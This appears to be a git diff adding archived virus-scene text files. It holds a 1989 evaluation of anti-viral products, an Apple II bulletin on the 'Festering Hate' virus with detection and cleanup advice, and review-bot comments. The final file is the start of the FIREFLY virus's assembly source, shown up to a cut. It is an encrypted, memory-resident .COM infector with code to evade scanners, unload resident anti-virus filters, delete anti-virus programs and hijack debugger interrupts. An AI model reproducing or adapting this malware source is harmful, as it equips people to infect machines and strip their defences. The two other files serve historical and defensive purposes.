@@ -0,0 +1,499 @@ + + Anti-Viral Product Evaluation + May 5, 1989 + + This evaluation paper has been written by Jim Goodwin, Lynn +Marsh and Tim Sankary. It is copyrighted, 1989, and is intended +for circulation among fellow members of the virus research +community who use IBM PCs or compatibles. We do not consider it +complete, since we did not evaluate every available product, and +it is not intended as a public guide to selecting antiviral +programs. We hope, however, that it will prove useful to other +members of the community who work with live viruses and need +ongoing protection for their systems. This document may be +freely copied and distributed providing the disclaimer and +copyright are kept intact, and no changes, additions or deletions +are made to the text. + We would like to acknowledge the ample research data +provided by Jim Bates and Rusty Davis in England, Ivan Grebert of +Acal Corporation in Paris, Colin Haynes of the International +Computer Virus Institute, and the many volunteer researchers from +the Silicon Valley area that contributed so much to our efforts. +We would also like to acknowledge the HomeBase users group for +providing their detailed log of infection occurrences and other +epidemiological data. + + +The Need for a Reasonable Evaluation: + In the April issue of PC Magazine you will find a review of +11 antiviral products. The review, while well intentioned, +tested products against only two viruses (plus one simulated +virus that was developed by the magazine). None of the viruses +were boot sector infectors (viruses which attach to the boot +sector) and none were among the most common viruses. Since the +vast majority of virus infections are boot sector infections, and +since most viruses are much more difficult to detect than the two +chosen, the results of the review were next to meaningless. The +PC Magazine review was similar to many others published in the +past year. 
It was performed without adequate access to the +viruses actually causing problems in the user community. + A second problem with these reviews, is that many of the +reviewers have had limited experience with the broad range of +infections that have occurred within the past 18 months. They +base evaluations on assumptions that do not hold for the real +world. This is not necessarily the fault of the reviewers. +Viruses are a new phenomenon and few people have dedicated their +time and resources to a long term study. A reviewer who has had +experience with only one or two viruses might naturally draw +incorrect conclusions about "generic" virus issues. + For example, a number of viruses infect programs using +common DOS calls (interrupt 21 or other interrupt call). This +type of infection can be easily detected and prevented. An +entire class of products, called Filters, has grown up around the +assumption that virus infections can be prevented by redirecting +certain interrupts and intercepting the infection replication +process. It works for a few viruses. The vast majority of +infections, though, are caused by viruses that use non-standard +I/O, and these infections cannot be prevented through interrupt +re-vectoring techniques. Thus, filter type products - included +among them are C-4 and Flu-Shot+ - are virtually useless against +most viruses. Yet many reviewers, and some product developers, +still believe that viruses can be stopped through re-directing +system interrupts. + +The criteria: + A lot of time and effort has gone into the various checksum, +encryption, logging and chaining algorithms proposed as safe +techniques for detecting viruses. And much discussion and +argumentation has gone one regarding the various merits of high +security algorithms. Yet, every generic application infector +that we have seen to date could have been detected by merely +checking to see if the SIZE of the file had changed. 
Developing +such a virus detector requires less than an hour of programming +time and is as effective as available products costing hundreds +of dollars. We're not suggesting that size checking should be +the criteria for detecting viruses (we know better), we are +merely pointing out the vast gulf between theory and current +reality. We understand that viruses of today may not reflect the +situation two years from now, and we also understand that current +boot sector viruses and certain operating system viruses pose a +special case to our size example, but the first step in solving +any problem must be a solid understanding of the current state of +the problem. And the current problem is in a different world +from the theoretical solutions proposed for it. + An astute reader might ask at this point why we would be +concerned if the proposed solutions to viruses were overkill. +Isn't it better, you might think, to include as much protection +as is available, to get as close to 100% security as possible? +We think not. Beta testing of virus products in many +corporations and our own experience with these products over the +past year has shown that, beyond a certain point of +reasonableness, increased security functions begin to hinder the +computing process. Either increases in required run time, or +user constraints or annoying additions to the system make the +products so cumbersome to use that the user ultimately discards +them. Alternately, false alarms and questionable product +conditions desensitize the user, and thus real virus alarms, when +they occur, are disregarded. + Again, we are not saying that sound security principles +should not be included in a given product. We are only +suggesting that the search for the 100% solution must have its +limits. 
The theoretical discussions about batch file viruses, +viruses that can imbed themselves within a program without +changing initial branch addresses, and viruses that can infect +without making any modifications to a program are interesting and +entertaining. But if you are selecting a product based on the +ability to detect such viruses, then you will be disappointed. + In general then, our criteria for evaluating antiviral +programs are: + + 1. The program's effectiveness against existing viruses. + There are anywhere from two dozen to over 50 different + PC viruses (depending on how you classify them) that + can infect your system today. If the product cannot + detect these viruses, then it certainly cannot detect + tomorrow's viruses. We rated this criteria the + highest. + + 2. The techniques used by the program to anticipate new + viruses. We have to admit to some subjectivity here. + No-one really knows what virus may pop up tomorrow, but + reasonable people can make reasonable guesses (Tim + Sankary is the only member of this review team who + admits to being unreasonable). We do expect to see + viruses in the next few years that can imbed themselves + inside a generic COM or EXE program without changing + its size. We anticipate system infectors and other + program-specific viruses that can imbed themselves AND + not change initial branch instructions. (We feel these + viruses, however, will be limited to common programs + such as IBMBIO, IBMSYS, COMMAND.COM etc.). We + anticipate viruses that will encrypt themselves in such + a way that every infection will be different (1704 + nearly achieves that now). We anticipate boot sector + viruses that will not need to save and execute the + original boot sector. We also expect viruses that will + entirely replace system modules, such as the command + interpreter. + + 3. The usability of the software. This is the most + subjective criteria and we accordingly weighted it the + least. 
We decided, however, that if we felt like + screaming, smashing the monitor or savagely beating the + family pets while trying to install or use the program, + then we would subtract points for lack of user + friendliness. + +The Viruses: + Jim Goodwin insisted that there were 61 PC viruses and that +we should test them all. He includes in this list three versions +of the Pakistani Brain that differ only in the imbedded text and +volume label copyright display, and four identical versions of +the 1704 that differ only in their activation dates. Lynn +Marsh, who has a new beau, and, we suspected, would like to +spend time with him, suggested that there were only 14 base PC +viruses. Any modifications to these viruses, she insisted, were +inconsequential and should be ignored. A compromise was reached +along the following lines: + + Any modification to a base virus that materially + altered its ability to be detected would be considered + a different virus for our testing purpose. + + Frankly, the definition didn't help us much because we +continued to squabble, but it eventually worked itself out. It +became clear that certain modifications to base viruses did +indeed materially affect our test results. As an example, one +modification to the Israeli virus, called the New Jerusalem, +performs a format of the hard disk when it activates, and it +additionally does not have the EXE infector bug that the +original Israeli had. When this virus activated, one antiviral +products that was able to detect the original Israeli file-delete +activation and prevent it, was unable to detect the modified +virus's format attempt. There were numerous other such +examples. Even machine or configuration type changes (such as +the numerous 1704 modifications) had an effect on testing under +certain circumstances. We finally narrowed the field down to 27 +distinct viruses, 11 of which were boot sector infectors. 
+ We realize that our test base is skewed if you compare it +to infection reporting statistics (where over 80% of infections +are boot sector infections), but we feel the sampling will become +more valid over time, since the boot infector ratio appears to be +slowly declining. + +The Testing: + All testing was performed on systems with fixed disks. +Where applicable, the infection was introduced onto the hard +disk. The only exceptions to this were five boot sector viruses +which would not replicate onto a fixed disk. When testing +against these floppy-only viruses, a 5 and 1/4 inch, 360KB +diskette was used. The test systems each contained over 300 +executable programs, approximately 2/3 EXE programs and 1/3 COM +programs, arranged in multiple levels of directories. Programs +with overlay structures were also included. DOS 2.0 and 3.3 were +both used, and testing was performed with and without the memory +resident program and shell routine - Carousel and Norton +Commander. Monochrome and VGA graphics adaptors were also +included. + All product detection tests were made while boot sector +viruses were already in memory and in control. This was a +critical point for us. For example, the Pakistani Brain is a +trivial virus to detect if you insert an infected floppy into an +uninfected system and run a detection program against it. If you +boot from an infected diskette, however, the detection process +becomes much more difficult (since the virus traps all attempts +to read the boot sector). We found only one generic product that +was able to detect the Brain while it was active. + When testing against generic COM and EXE infectors, we used +two approaches. First, we loaded the protection software onto a +clean machine and then infected it. Second, we infected a +machine with the virus, then installed the protection software, +and then allowed the virus to continue the infection process. 
+ Throughout the review process, we considered a product to be +ineffective against a given virus if any of the following +occurred: + + - The program was unable to detect the presence of + infection activity during its normal check cycle. + - The system hung when the virus was introduced, or + during the check cycle, and no warning indication was + given by the program prior to the hang-up. (This + assumed, of course, that the virus ran normally without + the prevention product being present) + - A loss of data occurred during the checking process. + + A product was considered to be effective against a given +virus if all of the following occurred: + + - The product identified the presence of infection + activity. + - The product was able to identify each and every + infected component of the system, name each infected + program, and specify the program's directory path. + + Usability ratings were loosely handled as follows: + + 1. Global detection products that required more than two + seconds per program for a system scan (ten minutes on + our test system) scored high on our aggravation scale. + 2. Programs that required us to use new system command + structures or required us to modify the way in which we + normally interface with the operating system or our + application programs were placed in the questionable + category. + 3. Programs that required constant attention to the user's + manual in order to be useful were frowned on. + (Allowances were made for Tim Sankary's slow thought + processes). + 4. Programs that caused false alarms were given an + annoyance ratio proportional to the number of false + alarms. + 5. Programs that installed in ten minutes and remained + invisible thereafter were well liked and much + appreciated. + + Please don't mistake our lighthearted attitude to the user +friendly category. It's just that we could not come up with a +really objective measure here. 
No matter how hard we tried, it +usually ended up being a matter of personal opinion. Keep in +mind that we weighted the whole user interface area low in +importance. + +The Products: + We were able to identify over twenty PC products being +distributed through vendor channels and through public +domain/shareware channels. We chose five to review that we felt +were the most commonly available and most widely used. + + + +C-4 +From McAfee Associates, 4423 Cheeney St, Santa Clara, CA 95054 +408 988 3832 + +*** NOT RECOMMENDED *** + + C-4 is a classic virus filter product which is simple to +install, easy to use and creates few false alarms. It is a +memory resident program that requires about 12K of memory (not +much) and seems to run efficiently, consuming few system +resources. The instruction manual is brief, concise and to the +point. It comes with an automatic install utility, and the +installation takes about 30 seconds. From there on it's +automatic. The checking function can be easily turned on and off +through a keyboard toggle, and a simple mechanism for excluding +"safe" programs is included. A pop-up window appears whenever a +violation is reported, and the name of the violating program, and +its target, are displayed. Programs that violate C-4's filter +criteria can be frozen and prevented from continuing the suspect +activity. All in all we found this product to be well designed, +solid, easy to use and fairly unobtrusive. A solid piece of +software engineering. + So what's the problem? Well, it doesn't work. Like all +filter products, it is limited to viruses that conform to +standard operating system conventions. These conventions include +using interrupts rather than branching directly into the BIOS, +keeping the original boot sector intact, not modifying the +command interpreter, etc. As we all know, not all viruses play +by these rules. + The net result of our testing showed that C-4 was unable to +prevent or detect any of the boot sector viruses. 
Additionally, +if the system was infected before loading c-4, it was unable to +detect future infections from any memory resident. + We cannot recommend this program. + + + +Flu-shot+ (Shareware) +from Software Concepts Design, 594 Third Avenue, NY, NY 10016 +212 889 6438 + +*** NOT RECOMMENDED *** + + FluShot+ is a mixture of filter program and detection +program. Like C-4, it attempts to trap system interrupts and +catch viruses in the act of replication. Like C-4, it is equally +unsuccessful. The infection detection aspects of the program add +little to its ability to protect against infection, but they do +contribute substantially to the overall cumbersome and +frustrating user interface. + The complicated documentation and installation required by +FluShot+, however, was not our overriding concern. The program +simply did not work. No boot sector virus was stopped or +detected by FluShot+, and the false alarm rate was high enough to +motivate many system users to ignore a real virus infection, +whenever one could be detected. + If we add to this the numerous quirks of the program, such +as problems running with graphics software and conflicts with +certain memory resident programs, we find little positive value +in it. + We cannot recommend this program. + + +Sentry (Shareware) +From McAfee Associates, 4423 Cheeney St, Santa Clara, CA 95054 +408 988 3832 + +*** HIGHLY RECOMMENDED *** + + Every so often an easier, simpler approach really does work, +and Sentry appears to be a one-in-a-million jewel of simplicity +and effectiveness. The most invisible product that we tested, +Sentry can be installed by anyone able to type the word +"install", and thereafter nothing more is seen or heard of it +until a virus hits the system. When it does, it's certain to get +caught. Sentry was the only product able to catch every one of +our test viruses. + It does have some small faults however. 
First, it +increases the system boot-up time by about 10 seconds for every +100 programs in your system. For the average user this will not +be a problem (the average person uses less than 50 programs, we +are told). For some folks however, this may become burdensome. +If you are one of those rare people who use (or at least have) +2,000 programs or more, you can expect to wait over 5 minutes +extra every time you boot your system. + A second fault is that people who do a lot of programming or +software development will constantly be changing executable files +on the disk. Sentry will prod you about these changes every time +you boot. The only way to shut it up is to re-install it so that +it can take a new snapshot of the current system state. We all +found this annoying (although, to be fair, every product that we +have seen has this same annoyance). One way around it is to do +all compiles, links, etc. in a given subdirectory and instruct +Sentry to ignore all the happenings in that subdirectory. This +works quite well. If you do not frequently compile, or daily +update your software to new versions, however, then Sentry should +remain innocuous. + A final caution about Sentry. It does not work properly in +the DOS 4.0 environment and should not be used in this +environment. We understand that a new version that will correct +this problem is currently under development. + Sentry works by creating a snapshot file of all critical +system elements and comparing that snapshot file to the current +state of the system at boot time. If you power down or re-boot +your system at least once a week, then Sentry will flag any +infection long before the infection will activate and cause +damage. If you are running in a networked environment, or in any +other environment where the machine is seldom turned off or re- +booted, then Sentry can be manually invoked by typing the command +- SENTRY. + Sentry uses a unique approach to detecting a virus. 
It +does not checksum the entire program, but only those areas of the +program would would have to change when any virus attaches to the +program. This allows it to execute very rapidly, and thus makes +periodic scans of the entire system feasible. This separates +Sentry from all other products. The second separator, of course, +is that it is effective against all of the viruses that currently +exist. We believe that this effectiveness will continue for new +viruses. + +Virus-Pro +From International Security Technologies, 515 Madison Avenue, NY, +NY 10022 212 288 3101 + +** RECOMMENDED ** + + Virus-Pro is a product designed for large corporations, and +we include it here for those researchers studying epidemiological +data using multiple computers as a study base. + Virus-Pro is much more than a virus detector. Virus-Pro +includes sophisticated audit trails and history information that +can be used track the origin of an infection within an +organization, and to monitor the use and movement of programs +from PC to PC. It does require a fair amount of run time for the +checking process, and a dedicated Virus-Pro systems administrator +or co-ordinator is needed, but it is an excellent system level +product. + The basic function of Virus-pro is to monitor the status of +the executable programs on the logical drives and to report on +changes and exceptions. Virus-Pro stores five parameters about +each executable or hidden file in a scan file. These parameters +are: + (1) The name, extension and path + (2) The size in bytes + (3) The date-time stamp + (4) The attributes (hidden, system, and read-only). + (5) A checksum of the program + + In addition, the program stores information about the +logical drive's boot track. Virus-Pro then compares the scan +file with both a prior scan file from the same logical drive and +a baseline file which has been created using scans of individual +software distribution diskettes. 
Differences in or matches to +one or more of these five parameters are used to determine the +presence of infection. + Administrative software makes it easy for an organization's +Virus-Pro co-ordinator to prepare diskettes for site co- +ordinators. Each site co-ordinator has similar facilities to +make Virus-Pro diskettes for his or her PC "owners". PC owner +diskettes include a disk scanning and analysis program. Site co- +ordinators use a program called MAKEBASE to place data extracted +from vendor diskettes into baseline files which a baseline +analysis program compares with the disk scan outputs. The +analysis can spot viruses, pirated software, wrong program +versions and a host of other inconsistencies of interest to a co- +ordinator. Two system-wide administrative programs maintain +master files of site co-ordinators and PC owners, print complete +name/address/phone number lists of co-ordinators and owners, +prepare diskettes, and provide other administrative functions. + Virus-Pro is the most comprehensive system level antivirus +product that we have seen or heard of. It does however require +more maintenance than stand-alone utility antiviral products, and +it did fail to catch four of the boot sector viruses (but caught +all others). In spite of this, We feel that it provides a fair +level of protection, and excellent audit trail capabilities for +tracking virus spread. + A note of caution: This is not a product for the individual +user of a stand-alone system. It is specifically designed for +the corporate environment. + + +Disk Defender +From Director Technologies, 906 University Place, Evanston, IL +60201 312 491 2334 + +** RECOMMENDED ** + + Disk defender is an add-on board for IBM PCs and +compatibles. The product write protects the hard disk from +erasure or modification to programs or data files that do not +require frequent changes. 
It can therefor protect against +viruses trying to attach to system or application programs, or +even to the boot sector. It blocks their attempts and provides a +visual indication that disk writes are being attempted to a write +protected area. + A switch attached to the board write protects the entire +disk, just a portion, or none of the disk. The switch can be +set, then removed and stored in a secure place. In addition, the +board allows a portion of the hard disk to be write protected, +while allowing normal writes to other areas. + Disk defender allows the hard disk to be divided into two +active DOS partitions and allows the user to designate an area or +zone as read only or as read/write. Indicator lights on the +switch box illuminate when an attempt is made to write to a +protected partition. + The disk defender is one of the most effective antiviral +products available for protecting the hard disk.. Clearly, if a +virus cannot physically access its host program, then it cannot +infect the system. It does not, however, protect against floppy +viruses. There is no software utility included with the package +to prevent or detect floppy boot sector infectors, for example. +Thus the 5 floppy based boot viruses lived and prospered quite +happily in the system with Disk Defender installed. There are +some other drawbacks as well. Installation is non trivial and +requires a backup of all data and a re-format of the hard disk. +Then all data and programs must be restored. Disk defender also +requires that files be re-organized, and some application +programs will have to be reconfigured if they use the C drive for +temporary storage. Thus, a degree of flexibility is lost which +may be unacceptable to some people. + In spite of its limits, however, Disk Defender is a highly +reliable and secure product for protecting your hard disk. + + + + +Jim Goodwin, Lynn Marsh and Tim Sankary + +From the HomeBase Virus Research Group +408 988 4004 \ No newline at end of file 
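Review bot: eval.vir is also committed without a final newline (`\ No newline at end of file` after the HomeBase phone number); add it for consistency with the .txt files in this commit. Beyond that, do not touch the body: the paper's own notice at the top permits distribution only if "no changes, additions or deletions are made to the text", so the source's typos (for example "would would have to change" in the Sentry description, "has gone one regarding" in the criteria section, and the lower-case "c-4") must be preserved in this archive rather than corrected.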
diff --git a/textfiles.com/virus/fester.vir b/textfiles.com/virus/fester.vir new file mode 100644 index 00000000..f2fe51db --- /dev/null +++ b/textfiles.com/virus/fester.vir 
@@ -0,0 +1,182 @@ + +FESTERING HATE +Typed and Compiled by the BOWEN ARROW........ +Reformatted to AWP by Doctor Dog +Converted OUT of AWP by Jason Scott (textfiles.com) + +OK, here's what I've been able to dig up so far on the Apple II virus: + +It IS real. It appears to insert/attach itself to the file called +BASIC.SYSTEM and increases its length by 7-8 Prodos blocks. + +I found it on one of my disks as a file called BLAST.START (filetype .SYS). +This file was part of a download of a packed file called NUKE.BLAST. +Unpacked you get the BLAST.START (29 Prodos blocks long) + BLAST (an +11-block Applesoft Basic file). + +If you copy Prodos 8, Basic.System, BLAST, and BLAST.START to any disk and +then boot the disk, you'll be left at the Basic Prompt (]). If you type RUN +BLAST or "-BLAST" then the program runs fine and asks a few questions about +distance from the nuclear blast, height of the explosion, etc and tells you +the resulting effect on human life. BLAST DOES NOT NEED BLAST.START TO RUN! + +If you type "-BLAST.START" then different things happen: It searches EVERY +PRODOS volume that you have on-line including 3.5's, 5.25's, hard drives, and +RAM drives. If it finds a file on any ONE of those volumes called +BASIC.SYSTEM then it attaches itself to it. If you run it a second time then +it will attach itself to another BASIC.SYSTEM if there is one. If there +isn't one then it will attach to the BASIC.SYSTEM on its own disk (which, up +to this point has remained unchanged). If it doesn't find a BASIC.SYSTEM +then it will quite happily boot BLAST leaving you none the wiser. + +*** CRITERIA / METHOD of INFESTATION **** + +Before the VIRUS will do anything to your files the following files MUST +be on the target volume: Prodos, and Basic.System. NOTE: This is for the +initial infestation from running BLAST.START only. 
If, instead, the virus is +to be spread from a volume with an infected BASIC.SYSTEM then the files +required on the target volume are: Prodos, Basic.System, AND any Applesoft +Basic program. If the above conditions are NOT present then the virus will +access the volumes but change nothing. HOWEVER, if a file other than +BASIC.SYSTEM has been infected (see below for how) then there is no apparent +minimum requirement for the target volume. There doesn't seem to be any set +rule here as the virus can infect more than one file on the same disk. One +thing is for certain though...the virus only infects one file per boot +access, although sometimes it may decide not to infect any files. I have +never yet had it infect a file called PRODOS, even though PRODOS is a .SYS +filetype. BUT, I have renamed PRODOS to something else and subsequently had +it infected. + +Basically the virus checks the volume for the file called BASIC.SYSTEM...it +can be any file that you've renamed BASIC.SYSTEM, it doesn't actually have +to be THE Basic.System file...and then it attaches itself to THE FIRST +.SYS ON THE VOLUME. This is an interesting 'feature' of the virus...if +BASIC.SYSTEM is present on the disk BUT it is not the first .SYS in the +directory then the virus will NOT infect BASIC.SYSTEM but will infect +the first SYS filetype (excluding Prodos) in the directory regardless of +what its called and how long it is. Thus the virus now increases its +media for spreading. Apparently the virus does not alter the infected file +as far as functionality goes...it just takes control for a few seconds after +the program is loaded...does its dastardly deed, and then hands control back +to the program...pretty sneaky. + +***** HOW DO YOU KNOW IF YOUR FILES ARE INFECTED? ***** + +Unfortunately, there's no sure way of telling how many of your files +have been infected. 
If you do a lot of downloading from BBS' OR if you get a +lot of files from friends who do a lot of downloading then you're more +susceptible. There are some tell-tale signs though: + +Check all volumes (disks, hard drives & RAM) for BASIC.SYSTEM. It should +be 21 Prodos blocks in length and have a Modified Date of around JUNE 14, +1984. If so, its likely safe. If, however, it has a length of 29 Prodos +blocks then its most likely been infected...delete that file! If your system +has a clock in it (all IIgs' come with one) then an infected file will have a +Modified Date of sometime in 1988, most likely within the last two weeks. + +CAUTION: Just because you don't have any BASIC.SYSTEM that's infected doesn't +mean that you're free and clear because other .SYS files can be infected too. +These are much harder to detect because most of the time you don't know how +long an uninfected file is so you won't whether its infected or not. Those +of you who have the clock can still check the Modified Date but those of you +without one are without the means to determine for sure. + +**** SUGGESTIONS FOR WHAT TO DO **** + +If you know that a file is infected then delete it and re-copy it from a +'good' disk. If there are no other .SYS files on the disk then you are safe. +If there are other .SYS files on a disk that may have been infected then you +should format a blank disk, copy Prodos, a good Basic.System, and one of +these SYS files onto the disk. Remove ALL other disks from drives, turn off +hard drives and backup RAM drives...boot the new disk, wait for the Basic +prompt (]), and run the .SYS file ("-"). The first clue that the +.SYS file is infected is if it accesses all drives. The clincher is if, +after booting (wkether it ran or not) and cataloging, you find that your good +BASIC.SYSTEM has been modified to 29 blocks. *- CAUTION - when running all +these 'tests' be careful to mark ALL temporary disks with a big "V" and then +re-format them after your tests are over. 
Obviously if your BASIC.SYSTEM has +been modified then you'll have to DELETE the suspect file and get another +copy from a friend. + +If your hard drive has been infected then there's no telling how many +files have been infected. My suggestion is, based on the fact that the virus +only hits .SYS files, copy all DATA or .TXT or .DOC or .AWP or .ASP or .ADB +files from your hard drive to backup disks. Try to keep these files on +separate disks from program files. Next copy all BAS files to backups, then +copy all BIN files to backups, etc, etc until your entire hard drive is +backed up. Then you can re-format your hard drive and re-copy the uninfected +files back to the drive. Meanwhile examine the .SYS files that you backed up +and determine which ones you can replace from a new source (a friend, +etc)...and DO it. The .SYS files that remain can be tested the same way as +described above or you can elect to delete them...your choice. + +*** SAFETY *** + +It is advisable that, while this virus threat is still around, you +pre-test any new downloads that yuo get. Turn off your hard drive(s) and +printout a catalog of the program files first. Then boot the program and see +if anything changes on the disk. It'd also be a good idea to have a 'dummy' +diskette in another drive with just Prodos, a clean Basic.System and one +Basic program on it. If this gets infected then you'll know the new program +you downloaded is also infected. Please NOTE: I said that I discovered this +virus in "NUKE.BLAST"...that doesn't mean that this is the only file OR that +this is where the virus originated. + +OK, that's basically all I have discovered so far. I was lucky that I +located my infected file early AND that I had saved it on a file disk that +ad no .SYS files on it. I hope everyone else who reads this is as lucky!! 
+ +One final note - I, as yet, have not found out exactly what happens +to trigger the virus to trash the contents of a volume - I only know that +several people have had their hard drives comletely trashed. It appears that +the virus remains dormant and is triggered either by a count of boots or by a +date or ??? It appears that when it does its thing then it gives you a +message about it and who's responsible. I will not lower myself to comment +on the quality of individual who would dream up a stunt like this. + + As soon as I get more info I will be passing it on. Meanwhile if +anyone has anything to add OR if you discover other infected files then +please share the info. To date, the files that I have heard of that are +nfected are as follows: NUKE.BLAST, ZLINK, SQUIRT v1.5, and Mr. FIXIT v 3.7 + +LATEST UPDATE---- + +The VIRUS is called FESTERING HATE and when it goes of there is a +Mpicture of a diskette being pricked by a needle. It says that it is written +by the K/RAD ALLIANCE and, apparently it has been known, on very rare +occassions, to infect a file more than once. This last part has not been +substantiated. + +Oh, some guy who had his HD trashed managed to use his FINGERPRINT card to +capture the title page of the virus: + + [WOP] -666- FESTERING HATE -666- [FOG] + ======================================== + W| The Good News: You now have a copy |F + o| of one of the greatest programs |r + r| that has ever been created! |i + s| The Bad News: Its quite likely |e + h| that its the only program you now |n + i| have in your possession. |d + p|====================================|s + p| Hey Glen! We sincerely hope our | + e| royalty checks are in the mail! |o + r| Seeing how we're making you rich |f + s| by providing a market for virus | + | detection software! |G + o|====================================|l + f|Elect LORD DIGITAL as GOD committee!|e + |====================================|n + P| )/> The Kool/Rad Alliance! 
<\( | + a| Rancid Grapefruit -- Cereal Killer |B + t|====================================|r + r| This program is made possible by a |e + i| grant from Pig's Knuckle ELITE |d + c| Research. Orderline: 313/534-1466 |o + k======[(C) 1988 ELECTRONIC ARTS]======N + + ...more later.... + +Courtesy of Bowen Arrow + + >>>---Arrow---> diff --git a/textfiles.com/virus/firefly.txt b/textfiles.com/virus/firefly.txt new file mode 100644 index 00000000..7ba5183e --- /dev/null +++ b/textfiles.com/virus/firefly.txt 
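Review bot: the detection indicators this post gives (BASIC.SYSTEM growing from 21 to 29 ProDOS blocks, a Modified Date "sometime in 1988, most likely within the last two weeks") are relative to an unstated writing date, and nothing in the hunk records when or on which board the post was made apart from "Courtesy of Bowen Arrow" and the "(C) 1988" inside the captured title page; the commit message or the archive index should carry the original posting date so the "last two weeks" reference stays interpretable. The post's own caution that other .SYS files can be infected without a known clean length is the reason the 21/29-block check alone is not sufficient, and an index description of this file should reflect that rather than quoting only the block-count test.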
@@ -0,0 +1,516 @@ +;FIREFLY virus, by Nikademus. +; +;Firefly is an encrypted, memory resident virus which infects +;.COMfiles on load. It incorporates code from Proto-T, +;LokJaw and YB-X viruses and, when in memory, attacks a large selection +;of anti-virus programs as they are executed. Anti-virus programs +;identified by Firefly's execute/load handler are deleted. +;Firefly incorporates simple code from previous issues of the newsletter +;designed to de-install generic VSAFE resident virus activity +;filters designed for Microsoft by Central Point Software. It +;contains instructions - specifically a segment of pseudo-nested +;loops - which spoof F-Protect's expert system generic virus +;identification feature. +; +;FIREFLY also includes a visual marker tied to the system timer +;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock +;and ScrollLock LEDs on the keyboard. This produces a noticeable +;twinkling effect when the virus is active on a machine. +; +;Anti-anti-virus measures used by Firefly vary in effectiveness +;dependent upon how a user employs software. For example, while +;Firefly is designed to delete the Victor Charlie anti-virus +;shell, VC.EXE, a user who employs the software packages utilities +;for generic virus detection singly, will not be interfered with +;by the virus. Your results may vary, but the virus does effectively +;delete anti-virus programs while in memory unless steps are taken +;beforehand to avoid this. +; +;Firefly incorporates minor code armoring techniques designed to thwart +;trivial debugging. 
+ + + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h + +len equ offset last - start +vir_len equ len / 16d ; 16 bytes per paragraph +encryptlength equ (last - begin)/4+1 + + + +start: + mov bx, offset begin ; The Encryption Head + mov cx, encryptlength ; +encryption_loop: ; + db 81h ; XOR WORD PTR [BX], ????h + db 37h ; +encryption_value_1: ; + dw 0000h ; + ; + db 81h ; XOR WORD PTR [BX+2], ????h + db 77h ; + db 02h ; 2 different random words +encryption_value_2: ; give 32-bit encryption + dw 0000h ; + add bx, 4 ; + loop encryption_loop ; +begin: + jmp virus + db '[Firefly] By Nikademus $' + db 'Greetings to Urnst Kouch and the CRYPT staff. $' +virus: + call bp_fixup ; bp fixup to determine +bp_fixup: ; locations of data + pop bp ; with respect to the new + sub bp, offset bp_fixup ; host + +Is_I_runnin: + call screw_fprot ; screwing + call screw_fprot ; heuristic scanning + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + push ds + push es + mov ax,2C2Ch ; + int 21h ; call to see if runnin + cmp ax, 0FFFh ; am i resident? + jne cut_hole ; +fix_victim: + pop es ; replace victims 3 bytes + pop ds ; + mov di,050h ; stops one of SCAN's + add di,0B0h ; generic scan attempts + lea si, ds:[vict_head + bp] ; (scan only worked on + mov cx, 03h ; unencrypted copies + rep movsb ; regardless) +Bye_Bye: + mov bx, 100h ; jump to 100h + jmp bx ; (start of victim) +cut_hole: + mov dx, 5945h ; pull CPAV (MSAV) + mov ax, 64001d ; out of memory + int 16h ; (This also screws with + ; TBCLEAN ???????) 
+ + call screw_fprot ; more screwing of + call screw_fprot ; heuristic scanning + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + + mov bx,cs ; reduce memory size + dec bx ; + mov ds,bx ; + cmp byte ptr ds:[0000],5a ; + jne fix_victim ; + mov bx,ds:[0003] ; + sub bx, 100h ; # of 16byte paragraphs + mov ds:0003,bx ; to grab (4k) +Zopy_me: + xchg bx, ax ; copy self to the new + mov bx, es ; 'unused' part of memory + add bx, ax ; + mov es, bx ; + mov cx,len ; + mov ax,ds ; + inc ax ; + mov ds,ax ; + lea si,ds:[offset start+bp] ; + lea di,es:0100 ; + rep movsb ; + +Hookroutines: ; interrupt manipulation (Happy!, Happy!) + xor ax, ax ; (Joy!, Joy!) + mov ds, ax + push ds ; push 0000h + lds ax, ds:[1Ch*4] + mov word ptr es:old_1Ch, ax ; save 1C + mov word ptr es:old_1Ch+2, ds + pop ds + push ds + lds ax, ds:[21h*4] ; get int 21h + mov word ptr es:old_21h, ax ; save 21 + mov word ptr es:old_21h+2, ds + mov bx, ds ; bx = ds + pop ds + mov word ptr ds:[1h*4], ax ; put int 21h into 1 and 3 + mov word ptr ds:[1h*4+2], bx ; this should screw + mov word ptr ds:[3h*4], ax ; most debuggers + mov word ptr ds:[3h*4+2], bx + mov word ptr ds:[21h*4], offset Firefly ; put self in 21 + mov ds:[21h*4+2], es ; + mov ds:[1Ch*4+2], es + mov word ptr ds:[1Ch*4], offset Lights ; hook 1C + jmp fix_victim +Lights: ; keyboard lights changer... + ; found in NIKTRKS1.ZIP + push ax ; save these + push bx ; + push cx ; + push dx ; + push si ; + push di ; + push ds ; + push es ; + + push cs + pop ds + push cs + pop es + cmp [click], 63d ; after 63 clicks + je one + cmp [click], 126d ; after 126 clicks + je two + cmp [click], 189d ; after 189 clicks + je three + cmp [click], 0ffh ; have we counted to 255? 
